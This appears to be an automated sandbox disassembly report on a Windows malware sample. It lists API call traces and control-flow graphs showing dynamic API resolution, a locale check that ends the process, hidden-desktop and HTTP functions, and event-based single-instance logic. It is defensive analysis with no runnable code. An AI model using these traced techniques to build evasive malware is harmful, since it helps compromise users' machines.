                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2473 8e29e0-8e2a42 GetProcessHeap RtlAllocateHeap GetUserNameA
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 008E2A0F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E2A16
                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 008E2A2A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 5225c5ceac0f7a5c5e740420bfebcfba997cd7f0a475d817e2a978f4086d5df9
                                    • Instruction ID: e2f79d9401c55482769c6829947a1e7316210c45ab208a63357e9ea8600e6057
                                    • Opcode Fuzzy Hash: 5225c5ceac0f7a5c5e740420bfebcfba997cd7f0a475d817e2a978f4086d5df9
                                    • Instruction Fuzzy Hash: 75F090B1A40204ABC700DBC8DD49BAABBBCF744B25F000216F914E2680D7B8190486A1
                                    Function 008E6710 Relevance: 242.2, APIs: 115, Strings: 23, Instructions: 696libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 8e6710-8e6717 634 8e6b2e-8e6bc2 LoadLibraryA * 8 633->634 635 8e671d-8e6b29 GetProcAddress * 43 633->635 636 8e6c38-8e6c3f 634->636 637 8e6bc4-8e6c33 GetProcAddress * 5 634->637 635->634 638 8e6c45-8e6cfd GetProcAddress * 8 636->638 639 8e6d02-8e6d09 636->639 637->636 638->639 640 8e6d7f-8e6d86 639->640 641 8e6d0b-8e6d7a GetProcAddress * 5 639->641 642 8e6d8c-8e6e14 GetProcAddress * 6 640->642 643 8e6e19-8e6e20 640->643 641->640 642->643 644 8e6e26-8e6f3b GetProcAddress * 12 643->644 645 8e6f40-8e6f47 643->645 644->645 646 8e6fbd-8e6fc4 645->646 647 8e6f49-8e6fb8 GetProcAddress * 5 645->647 648 8e6fc6-8e6fec GetProcAddress * 2 646->648 649 8e6ff1-8e6ff8 646->649 647->646 648->649 650 8e6ffa-8e7020 GetProcAddress * 2 649->650 651 8e7025-8e702c 649->651 650->651 652 8e711d-8e7124 651->652 653 8e7032-8e7118 GetProcAddress * 10 651->653 654 8e7126-8e717d GetProcAddress * 4 652->654 655 8e7182-8e7189 652->655 653->652 654->655 656 8e719e-8e71a5 655->656 657 8e718b-8e7199 GetProcAddress 655->657 658 8e71a7-8e71fe GetProcAddress * 4 656->658 659 8e7203 656->659 657->656 658->659
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,00525750), ref: 008E6725
                                    • GetProcAddress.KERNEL32(74DD0000,00525730), ref: 008E673D
                                    • GetProcAddress.KERNEL32(74DD0000,00539658), ref: 008E6756
                                    • GetProcAddress.KERNEL32(74DD0000,00539670), ref: 008E676E
                                    • GetProcAddress.KERNEL32(74DD0000,00539688), ref: 008E6786
                                    • GetProcAddress.KERNEL32(74DD0000,005396A0), ref: 008E679F
                                    • GetProcAddress.KERNEL32(74DD0000,0052B900), ref: 008E67B7
                                    • GetProcAddress.KERNEL32(74DD0000,0053D340), ref: 008E67CF
                                    • GetProcAddress.KERNEL32(74DD0000,0053D460), ref: 008E67E8
                                    • GetProcAddress.KERNEL32(74DD0000,0053D298), ref: 008E6800
                                    • GetProcAddress.KERNEL32(74DD0000,0053D2C8), ref: 008E6818
                                    • GetProcAddress.KERNEL32(74DD0000,005259F0), ref: 008E6831
                                    • GetProcAddress.KERNEL32(74DD0000,00525850), ref: 008E6849
                                    • GetProcAddress.KERNEL32(74DD0000,00525770), ref: 008E6861
                                    • GetProcAddress.KERNEL32(74DD0000,005257B0), ref: 008E687A
                                    • GetProcAddress.KERNEL32(74DD0000,0053D250), ref: 008E6892
                                    • GetProcAddress.KERNEL32(74DD0000,0053D3B8), ref: 008E68AA
                                    • GetProcAddress.KERNEL32(74DD0000,0052B9A0), ref: 008E68C3
                                    • GetProcAddress.KERNEL32(74DD0000,00525970), ref: 008E68DB
                                    • GetProcAddress.KERNEL32(74DD0000,0053D490), ref: 008E68F3
                                    • GetProcAddress.KERNEL32(74DD0000,0053D268), ref: 008E690C
                                    • GetProcAddress.KERNEL32(74DD0000,0053D3E8), ref: 008E6924
                                    • GetProcAddress.KERNEL32(74DD0000,0053D4A8), ref: 008E693C
                                    • GetProcAddress.KERNEL32(74DD0000,005259B0), ref: 008E6955
                                    • GetProcAddress.KERNEL32(74DD0000,0053D280), ref: 008E696D
                                    • GetProcAddress.KERNEL32(74DD0000,0053D2B0), ref: 008E6985
                                    • GetProcAddress.KERNEL32(74DD0000,0053D2E0), ref: 008E699E
                                    • GetProcAddress.KERNEL32(74DD0000,0053D2F8), ref: 008E69B6
                                    • GetProcAddress.KERNEL32(74DD0000,0053D310), ref: 008E69CE
                                    • GetProcAddress.KERNEL32(74DD0000,0053D430), ref: 008E69E7
                                    • GetProcAddress.KERNEL32(74DD0000,0053D328), ref: 008E69FF
                                    • GetProcAddress.KERNEL32(74DD0000,0053D358), ref: 008E6A17
                                    • GetProcAddress.KERNEL32(74DD0000,0053D400), ref: 008E6A30
                                    • GetProcAddress.KERNEL32(74DD0000,0053A470), ref: 008E6A48
                                    • GetProcAddress.KERNEL32(74DD0000,0053D370), ref: 008E6A60
                                    • GetProcAddress.KERNEL32(74DD0000,0053D418), ref: 008E6A79
                                    • GetProcAddress.KERNEL32(74DD0000,00525870), ref: 008E6A91
                                    • GetProcAddress.KERNEL32(74DD0000,0053D448), ref: 008E6AA9
                                    • GetProcAddress.KERNEL32(74DD0000,00525990), ref: 008E6AC2
                                    • GetProcAddress.KERNEL32(74DD0000,0053D388), ref: 008E6ADA
                                    • GetProcAddress.KERNEL32(74DD0000,0053D478), ref: 008E6AF2
                                    • GetProcAddress.KERNEL32(74DD0000,00525A30), ref: 008E6B0B
                                    • GetProcAddress.KERNEL32(74DD0000,00525CF0), ref: 008E6B23
                                    • LoadLibraryA.KERNEL32(0053D3A0,008E067A), ref: 008E6B35
                                    • LoadLibraryA.KERNEL32(0053D3D0), ref: 008E6B46
                                    • LoadLibraryA.KERNEL32(0053D4C0), ref: 008E6B58
                                    • LoadLibraryA.KERNEL32(0053D4D8), ref: 008E6B6A
                                    • LoadLibraryA.KERNEL32(0053D4F0), ref: 008E6B7B
                                    • LoadLibraryA.KERNEL32(0053D208), ref: 008E6B8D
                                    • LoadLibraryA.KERNEL32(0053D220), ref: 008E6B9F
                                    • LoadLibraryA.KERNEL32(0053D238), ref: 008E6BB0
                                    • GetProcAddress.KERNEL32(75290000,00525DF0), ref: 008E6BCC
                                    • GetProcAddress.KERNEL32(75290000,0053D6B8), ref: 008E6BE4
                                    • GetProcAddress.KERNEL32(75290000,00539108), ref: 008E6BFD
                                    • GetProcAddress.KERNEL32(75290000,0053D658), ref: 008E6C15
                                    • GetProcAddress.KERNEL32(75290000,00525B10), ref: 008E6C2D
                                    • GetProcAddress.KERNEL32(734C0000,0052B9C8), ref: 008E6C4D
                                    • GetProcAddress.KERNEL32(734C0000,00525CB0), ref: 008E6C65
                                    • GetProcAddress.KERNEL32(734C0000,0052B928), ref: 008E6C7E
                                    • GetProcAddress.KERNEL32(734C0000,0053D6A0), ref: 008E6C96
                                    • GetProcAddress.KERNEL32(734C0000,0053D688), ref: 008E6CAE
                                    • GetProcAddress.KERNEL32(734C0000,00525D70), ref: 008E6CC7
                                    • GetProcAddress.KERNEL32(734C0000,00525E10), ref: 008E6CDF
                                    • GetProcAddress.KERNEL32(734C0000,0053D5F8), ref: 008E6CF7
                                    • GetProcAddress.KERNEL32(752C0000,00525DD0), ref: 008E6D13
                                    • GetProcAddress.KERNEL32(752C0000,00525B30), ref: 008E6D2B
                                    • GetProcAddress.KERNEL32(752C0000,0053D670), ref: 008E6D44
                                    • GetProcAddress.KERNEL32(752C0000,0053D5B0), ref: 008E6D5C
                                    • GetProcAddress.KERNEL32(752C0000,00525AF0), ref: 008E6D74
                                    • GetProcAddress.KERNEL32(74EC0000,0052B630), ref: 008E6D94
                                    • GetProcAddress.KERNEL32(74EC0000,0052B810), ref: 008E6DAC
                                    • GetProcAddress.KERNEL32(74EC0000,0053D508), ref: 008E6DC5
                                    • GetProcAddress.KERNEL32(74EC0000,00525B50), ref: 008E6DDD
                                    • GetProcAddress.KERNEL32(74EC0000,00525C30), ref: 008E6DF5
                                    • GetProcAddress.KERNEL32(74EC0000,0052B9F0), ref: 008E6E0E
                                    • GetProcAddress.KERNEL32(75BD0000,0053D5E0), ref: 008E6E2E
                                    • GetProcAddress.KERNEL32(75BD0000,00525BD0), ref: 008E6E46
                                    • GetProcAddress.KERNEL32(75BD0000,00539218), ref: 008E6E5F
                                    • GetProcAddress.KERNEL32(75BD0000,0053D598), ref: 008E6E77
                                    • GetProcAddress.KERNEL32(75BD0000,0053D5C8), ref: 008E6E8F
                                    • GetProcAddress.KERNEL32(75BD0000,00525C50), ref: 008E6EA8
                                    • GetProcAddress.KERNEL32(75BD0000,00525C10), ref: 008E6EC0
                                    • GetProcAddress.KERNEL32(75BD0000,0053D610), ref: 008E6ED8
                                    • GetProcAddress.KERNEL32(75BD0000,0053D568), ref: 008E6EF1
                                    • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 008E6F07
                                    • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 008E6F1E
                                    • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 008E6F35
                                    • GetProcAddress.KERNEL32(75A70000,00525CD0), ref: 008E6F51
                                    • GetProcAddress.KERNEL32(75A70000,0053D550), ref: 008E6F69
                                    • GetProcAddress.KERNEL32(75A70000,0053D520), ref: 008E6F82
                                    • GetProcAddress.KERNEL32(75A70000,0053D628), ref: 008E6F9A
                                    • GetProcAddress.KERNEL32(75A70000,0053D538), ref: 008E6FB2
                                    • GetProcAddress.KERNEL32(75450000,00525E30), ref: 008E6FCE
                                    • GetProcAddress.KERNEL32(75450000,00525C70), ref: 008E6FE6
                                    • GetProcAddress.KERNEL32(75DA0000,00525C90), ref: 008E7002
                                    • GetProcAddress.KERNEL32(75DA0000,0053D580), ref: 008E701A
                                    • GetProcAddress.KERNEL32(6F070000,00525AB0), ref: 008E703A
                                    • GetProcAddress.KERNEL32(6F070000,00525B70), ref: 008E7052
                                    • GetProcAddress.KERNEL32(6F070000,00525D50), ref: 008E706B
                                    • GetProcAddress.KERNEL32(6F070000,0053D640), ref: 008E7083
                                    • GetProcAddress.KERNEL32(6F070000,00525B90), ref: 008E709B
                                    • GetProcAddress.KERNEL32(6F070000,00525D30), ref: 008E70B4
                                    • GetProcAddress.KERNEL32(6F070000,00525BB0), ref: 008E70CC
                                    • GetProcAddress.KERNEL32(6F070000,00525BF0), ref: 008E70E4
                                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 008E70FB
                                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 008E7112
                                    • GetProcAddress.KERNEL32(75AF0000,0053D148), ref: 008E712E
                                    • GetProcAddress.KERNEL32(75AF0000,00539178), ref: 008E7146
                                    • GetProcAddress.KERNEL32(75AF0000,0053D1D8), ref: 008E715F
                                    • GetProcAddress.KERNEL32(75AF0000,0053CFC8), ref: 008E7177
                                    • GetProcAddress.KERNEL32(75D90000,00525E50), ref: 008E7193
                                    • GetProcAddress.KERNEL32(6CE70000,0053CF20), ref: 008E71AF
                                    • GetProcAddress.KERNEL32(6CE70000,00525D10), ref: 008E71C7
                                    • GetProcAddress.KERNEL32(6CE70000,0053CFE0), ref: 008E71E0
                                    • GetProcAddress.KERNEL32(6CE70000,0053CFF8), ref: 008E71F8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: 0WR$0ZR$0[R$0\R$0]R$0^R$CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA$PWR$PXR$P[R$P\R$P]R$P^R$pWR$pXR$pYR$p[R$p\R$p]R
                                    • API String ID: 2238633743-2570387859
                                    • Opcode ID: c2cf499d9ceb66457c353495423a93ed37e132f92b97f8634b3ff54c35403784
                                    • Instruction ID: 17af9910b4255d8a33efd51c199ff075a5241e6d4cb93b70f5a4b4e2ec7ffaa8
                                    • Opcode Fuzzy Hash: c2cf499d9ceb66457c353495423a93ed37e132f92b97f8634b3ff54c35403784
                                    • Instruction Fuzzy Hash: 3262F7B5A11200AFD754DFE5EC88A377BBAF7886413108919E956C3364DF38A843DF68
                                    Function 008DF300 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1164stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(008ED014), ref: 008DF32E
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF34C
                                    • lstrlen.KERNEL32(008ED014), ref: 008DF357
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF371
                                    • lstrlen.KERNEL32(008ED014), ref: 008DF37C
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF396
                                    • lstrcpy.KERNEL32(00000000,008F5568), ref: 008DF3BE
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF3EC
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF422
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DF454
                                    • lstrlen.KERNEL32(005258B0), ref: 008DF476
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DF506
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DF52B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DF5E2
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008DF894
                                    • lstrlen.KERNEL32(00539258), ref: 008DF8C2
                                    • lstrcpy.KERNEL32(00000000,00539258), ref: 008DF8EF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DF912
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DF966
                                    • lstrcpy.KERNEL32(00000000,00539258), ref: 008DFA28
                                    • lstrcpy.KERNEL32(00000000,00539148), ref: 008DFA58
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DFAB7
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008DFBD5
                                    • lstrlen.KERNEL32(00539268), ref: 008DFC03
                                    • lstrcpy.KERNEL32(00000000,00539268), ref: 008DFC30
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DFC53
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DFCA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: ERROR
                                    • API String ID: 367037083-2861137601
                                    • Opcode ID: df00d7047b76f3bcb5c4d1b481c1f24eced4ecec8f0a3a0a3612335d8be5e3b6
                                    • Instruction ID: 6ea95fb7249c81b4cb17a5b0b25b560e62b831ea56ede185b8cbeafdb25762b4
                                    • Opcode Fuzzy Hash: df00d7047b76f3bcb5c4d1b481c1f24eced4ecec8f0a3a0a3612335d8be5e3b6
                                    • Instruction Fuzzy Hash: 1CA22B709016428FC724DF69D848B2ABBE5FF84314F18867EE54ACB3A2DB35D842DB51
                                    Function 008E01D0 Relevance: 43.4, APIs: 25, Strings: 3, Instructions: 1433stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E022F
                                    • lstrlen.KERNEL32(008ED014), ref: 008E0250
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E0285
                                    • lstrlen.KERNEL32(008ED014), ref: 008E0290
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E02C5
                                    • lstrlen.KERNEL32(008ED014), ref: 008E02D0
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E0305
                                    • lstrlen.KERNEL32(008ED014), ref: 008E0321
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E0356
                                    • lstrlen.KERNEL32(008ED014), ref: 008E0361
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E0393
                                    • lstrlen.KERNEL32(008ED014), ref: 008E039E
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E03CA
                                    • lstrlen.KERNEL32(008ED014), ref: 008E03F5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E0421
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: 0XR$XS$fplugins
                                    • API String ID: 367037083-271862425
                                    • Opcode ID: 8868131ce4ac8f142522f6c02b0d84fd11ad843f0739581e51a82585709fcaf4
                                    • Instruction ID: 285e0b1e9eea1bc93f4d5acc8a840460fea434bd83bfb33d8553e260220bf9f8
                                    • Opcode Fuzzy Hash: 8868131ce4ac8f142522f6c02b0d84fd11ad843f0739581e51a82585709fcaf4
                                    • Instruction Fuzzy Hash: 74D23770A012458FCB24DF6AC888BA9BBB0FF09314F5985ADD408DB292DB75DD86CF51
                                    Function 008E1BD0 Relevance: 40.7, APIs: 27, Instructions: 194stringsleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2105 8e1bd0-8e1beb call 8c29a0 call 8e63c0 2110 8e1bed 2105->2110 2111 8e1bfa-8e1c07 call 8c2840 2105->2111 2112 8e1bf0-8e1bf8 2110->2112 2115 8e1c09-8e1c0f lstrcpy 2111->2115 2116 8e1c15-8e1c26 GetUserDefaultLangID 2111->2116 2112->2111 2112->2112 2115->2116 2117 8e1c3e-8e1c50 call 8e2a70 call 8e3db0 2116->2117 2118 8e1c28-8e1c2f 2116->2118 2124 8e1c6d-8e1c8c lstrlen call 8c2840 2117->2124 2125 8e1c52-8e1c64 call 8e29e0 call 8e3db0 2117->2125 2118->2117 2119 8e1c36-8e1c38 ExitProcess 2118->2119 2130 8e1c8e-8e1c93 2124->2130 2131 8e1ca9-8e1cc6 lstrlen call 8c2840 2124->2131 2125->2124 2138 8e1c66-8e1c67 ExitProcess 2125->2138 2130->2131 2133 8e1c95-8e1c97 2130->2133 2139 8e1cc8-8e1cca 2131->2139 2140 8e1ce0-8e1d01 call 8e2a70 lstrlen call 8c2840 2131->2140 2133->2131 2136 8e1c99-8e1ca3 lstrcpy lstrcat 2133->2136 2136->2131 2139->2140 2141 8e1ccc-8e1cda lstrcpy lstrcat 2139->2141 2146 8e1d03-8e1d05 2140->2146 2147 8e1d20-8e1d3a lstrlen call 8c2840 2140->2147 2141->2140 2146->2147 2149 8e1d07-8e1d0b 2146->2149 2152 8e1d3c-8e1d3e 2147->2152 2153 8e1d54-8e1d71 call 8e29e0 lstrlen call 8c2840 2147->2153 2149->2147 2151 8e1d0d-8e1d1a lstrcpy lstrcat 2149->2151 2151->2147 2152->2153 2154 8e1d40-8e1d4e lstrcpy lstrcat 2152->2154 2159 8e1d73-8e1d75 2153->2159 2160 8e1d90-8e1d95 2153->2160 2154->2153 2159->2160 2161 8e1d77-8e1d7b 2159->2161 2162 8e1d9c-8e1da8 call 8c2840 2160->2162 2163 8e1d97 call 8c2930 2160->2163 2161->2160 2165 8e1d7d-8e1d8a lstrcpy lstrcat 2161->2165 2168 8e1daa-8e1dac 2162->2168 2169 8e1db6-8e1dec call 8c2930 * 5 OpenEventA 2162->2169 2163->2162 2165->2160 2168->2169 2170 8e1dae-8e1db0 lstrcpy 2168->2170 2181 8e1dee 2169->2181 2182 8e1e14-8e1e28 CreateEventA call 8e1b00 call 8e01d0 2169->2182 2170->2169 2183 8e1df0-8e1e12 CloseHandle Sleep OpenEventA 2181->2183 2187 8e1e2d-8e1e36 CloseHandle ExitProcess 2182->2187 2183->2182 2183->2183
                                    APIs
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532308), ref: 008E6419
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,005324D0), ref: 008E6432
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532500), ref: 008E644A
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532218), ref: 008E6462
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00539128), ref: 008E647B
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,005259D0), ref: 008E6493
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,005258D0), ref: 008E64AB
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532410), ref: 008E64C4
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532230), ref: 008E64DC
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532248), ref: 008E64F4
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532470), ref: 008E650D
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00525A50), ref: 008E6525
                                      • Part of subcall function 008E63C0: GetProcAddress.KERNEL32(74DD0000,00532440), ref: 008E653D
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E1C0F
                                    • GetUserDefaultLangID.KERNEL32 ref: 008E1C15
                                    • ExitProcess.KERNEL32 ref: 008E1C38
                                    • ExitProcess.KERNEL32 ref: 008E1C67
                                    • lstrlen.KERNEL32(005391F8), ref: 008E1C74
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E1C9B
                                    • lstrcat.KERNEL32(00000000,005391F8), ref: 008E1CA3
                                    • lstrlen.KERNEL32(008F5160), ref: 008E1CAE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1CCE
                                    • lstrcat.KERNEL32(00000000,008F5160), ref: 008E1CDA
                                    • lstrlen.KERNEL32(00000000), ref: 008E1CE9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1D0F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1D1A
                                    • lstrlen.KERNEL32(008F5160), ref: 008E1D25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1D42
                                    • lstrcat.KERNEL32(00000000,008F5160), ref: 008E1D4E
                                    • lstrlen.KERNEL32(00000000), ref: 008E1D5D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1D7F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1D8A
                                      • Part of subcall function 008E29E0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 008E2A0F
